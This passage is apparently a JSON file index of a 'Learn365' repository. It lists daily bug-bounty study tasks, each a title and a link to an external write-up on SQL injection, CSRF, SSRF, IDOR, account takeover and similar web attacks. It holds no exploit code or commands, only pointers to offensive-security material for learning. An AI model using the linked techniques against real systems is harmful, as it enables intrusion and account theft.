"preview": "🎯 Day 68 Task\n\n\n✅ Exploiting SQL Injection\n\n\nhttps://medium.com/sud0root/bug-bounty-writeups-exploiting-sql-injection-vu"
},
{
"path": "Resources/Day 69 Task.md",
"chars": 225,
"preview": "🎯 Day 69 Task\n\n\n✅ A Weird Price Tampering Vulnerability\n\n\nhttps://medium.com/@vflexo/a-weird-price-tampering-vulnerabili"
},
{
"path": "Resources/Day 70 Task.md",
"chars": 194,
"preview": "🎯 Day 70 Task\n\n\n✅ A Summary of OAuth 2.0 Attack Methods\n\n\nhttps://medium.com/@TutorialBoy24/a-summary-of-oauth-2-0-attac"
},
{
"path": "Resources/Day 71 Task.md",
"chars": 284,
"preview": "🎯 Day 71 Task\n\n\n✅ Bypassing CSRF Protection\n\n\nhttps://medium.com/swlh/bypassing-csrf-protection-c9b217175ee\n\n\n✅ 6 Method"
},
{
"path": "Resources/Day 72 Task.md",
"chars": 212,
"preview": "🎯 Day 72 Task\n\n\n✅ Two-factor authentication security testing and possible bypasses\n\n\nhttps://medium.com/@iSecMax/two-fac"
},
{
"path": "Resources/Day 73 Task.md",
"chars": 278,
"preview": "🎯 Day 73 Task\n\n\n✅ 10 Types of Web Vulnerabilities that are Often Missed\n\n\nhttps://labs.detectify.com/2021/09/30/10-types"
},
{
"path": "Resources/Day 74 Task.md",
"chars": 214,
"preview": "🎯 Day 74 Task\n\n\n✅ My First Bug Bounty: SQL Injection\n\n\nhttps://infosecwriteups.com/first-bug-bounty-ever-sql-injection-d"
},
{
"path": "Resources/Day 75 Task.md",
"chars": 273,
"preview": "🎯 Day 75 Task\n\n\n✅ Dank Writeup On Broken Access Control\n\n\nhttps://infosecwriteups.com/dank-writeup-on-broken-access-cont"
},
{
"path": "Resources/Day 76 Task.md",
"chars": 250,
"preview": "🎯 Day 76 Task\n\n\n✅ SSRF in PDF Renderer using SVG\n\n\nhttps://pwn.vg/articles/2021-05/ssrf-in-pdf-renderer-using-svg\n\n✅ Byp"
},
{
"path": "Resources/Day 77 Task.md",
"chars": 219,
"preview": "🎯 Day 77 Task\n\n\n✅ Easy IDOR hunting with Autorize?\n\n\nhttps://youtu.be/2WzqH6N-Gbc\n\n\n✅ HOW I hacked thousand of subdomain"
},
{
"path": "Resources/Day 78 Task.md",
"chars": 234,
"preview": "🎯 Day 78 Task\n\n\n✅ A business logic error bug worth 600$\n\n\nhttps://itsdeepceh.medium.com/a-business-logic-error-bug-worth"
},
{
"path": "Resources/Day 79 Task.md",
"chars": 342,
"preview": "🎯 Day 79 Task\n\n\n✅ How to find IDOR | Privilege escalation | weak authorization | Broken access control | Burp Autorize\n\n"
},
{
"path": "Resources/Day 80 Task.md",
"chars": 313,
"preview": "🎯 Day 80 Task\n\n\n✅ Account Takeover via Web Cache Poisoning based Reflected XSS\n\n\nhttps://lutfumertceylan.com.tr/posts/ac"
},
{
"path": "Resources/Day 81 Task.md",
"chars": 249,
"preview": "🎯 Day 81 Task\n\n\n✅ Account Takeover: From zero to System Admin using basic skills\n\n\nhttps://youtu.be/t6-SXKIun8s\n\n\n✅ Apac"
},
{
"path": "Resources/Day 82 Task.md",
"chars": 287,
"preview": "🎯 Day 82 Task\n\n\n✅ The easiest $2500 I got it from bug bounty program\n\n\nhttps://3bodymo.medium.com/the-easiest-2500-i-got"
},
{
"path": "Resources/Day 83 Task.md",
"chars": 273,
"preview": "🎯 Day 83 Task\n\n\n✅ How I bypassed disable_functions in php to get a remote shell\n\n\nhttps://infosecwriteups.com/how-i-bypa"
},
{
"path": "Resources/Day 84 Task.md",
"chars": 200,
"preview": "🎯 Day 84 Task\n\n\n✅ Finding Your Next Bug: GraphQL\n\nhttps://youtu.be/jyjGneKJynk\n\n\n✅ No Rate Limit - 2K$ Bounty\n\n\nhttps://"
},
{
"path": "Resources/Day 85 Task.md",
"chars": 299,
"preview": "🎯 Day 85 Task\n\n\n✅ Facebook email disclosure and account takeover\n\n\nhttps://medium.com/pentesternepal/facebook-email-disc"
},
{
"path": "Resources/Day 86 Task.md",
"chars": 236,
"preview": "🎯 Day 86 Task\n\n\n✅ Hacking banks with race conditions\n\n\nhttps://youtu.be/QtV3Qc-bY1s\n\n\n✅ Exploiting a Race Condition Vuln"
},
{
"path": "Resources/Day 87 Task.md",
"chars": 396,
"preview": "🎯 Day 87 Task\n\n\n✅ A Comprehensive Guide to Broken Access Control\n\n\nhttps://medium.com/purplebox/broken-access-control-f8"
},
{
"path": "Resources/Day 88 Task.md",
"chars": 282,
"preview": "🎯 Day 88 Task\n\n\n✅ A Journey from IDOR to Account Takeover\n\n\nhttps://payatu.com/blog/arjuns/A-Journey-IDOR-to-Account-Tak"
},
{
"path": "Resources/Day 89 Task.md",
"chars": 277,
"preview": "🎯 Day 89 Task\n\n\n✅ Union Based SQL Injection — Bug Hunting\n\n\nhttps://eslam3kl.medium.com/sql-injection-at-spotify-d19e086"
},
{
"path": "Resources/Day 90 Task.md",
"chars": 289,
"preview": "🎯 Day 90 Task\n\n\n✅ Exploiting cross-site scripting in Referer header\n\n\nhttps://www.gremwell.com/exploiting_xss_in_referer"
},
{
"path": "Resources/Day 91 Task.md",
"chars": 315,
"preview": "🎯 Day 91 Task\n\n\n✅ How I bypassed 403 forbidden domain using a simple trick\n\n\nhttps://janmuhammadzaidi.medium.com/how-i-b"
},
{
"path": "Resources/Day 92 Task.md",
"chars": 353,
"preview": "🎯 Day 92 Task\n\n\n✅ Bypassing SSRF Protection to Exfiltrate AWS Metadata from LarkSuite\n\n\nhttps://sirleeroyjenkins.medium."
},
{
"path": "Resources/Day 93 Task.md",
"chars": 143,
"preview": "🎯 Day 93 Task\n\n\n✅ 0-day Cross Origin Request Forgery vulnerability in Grafana 8.x\n\n\nhttps://hackerone.com/reports/145823"
},
{
"path": "Resources/Day 94 Task.md",
"chars": 205,
"preview": "🎯 Day 94 Task\n\n\n✅ GOT ACCESS TO DOTA 2 ADMIN PANEL BY EXPLOITING IN-GAME FEATURE\n\n\nhttps://abdilahrf.github.io/bugbounty"
},
{
"path": "Resources/Day 95 Task.md",
"chars": 117,
"preview": "🎯 Day 95 Task\n\n\n✅ How I escalated RFI into LFI\n\n\nhttp://hassankhanyusufzai.com/RFI_LFI_writeup/\n\n\n#infosec #learn365\n"
},
{
"path": "Resources/Day 96 Task.md",
"chars": 174,
"preview": "🎯 Day 96 Task\n\n\n✅ Stumbling upon a new way to exploit authorization bypass in Jira\n\n\nhttps://blog.detectify.com/2019/01/"
},
{
"path": "Resources/Day 97 Task.md",
"chars": 158,
"preview": "🎯 Day 97 Task\n\n\n✅ Clickjacking on Google MyAccount Worth 7,500$\n\n\nhttps://apapedulimu.click/clickjacking-on-google-myacc"
},
{
"path": "Resources/Day 98 Task.md",
"chars": 109,
"preview": "🎯 Day 98 Task\n\n\n✅ Info Disclosure and SQLi Writeup\n\n\nhttps://aaronesau.com/blog/posts/5\n\n\n#infosec #learn365\n"
},
{
"path": "Resources/Day 99 Task.md",
"chars": 259,
"preview": "🎯 Day 99 Task\n\n\n✅ CSRF to HTML INJECTION which results in USER CREDENTIALS Stealing\n\n\nhttps://medium.com/@armaanpathan/c"
}
]
About this extraction
This page contains the full source code of the Imran407704/Learn365 GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 146 files (132.1 KB), approximately 37.9k tokens. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.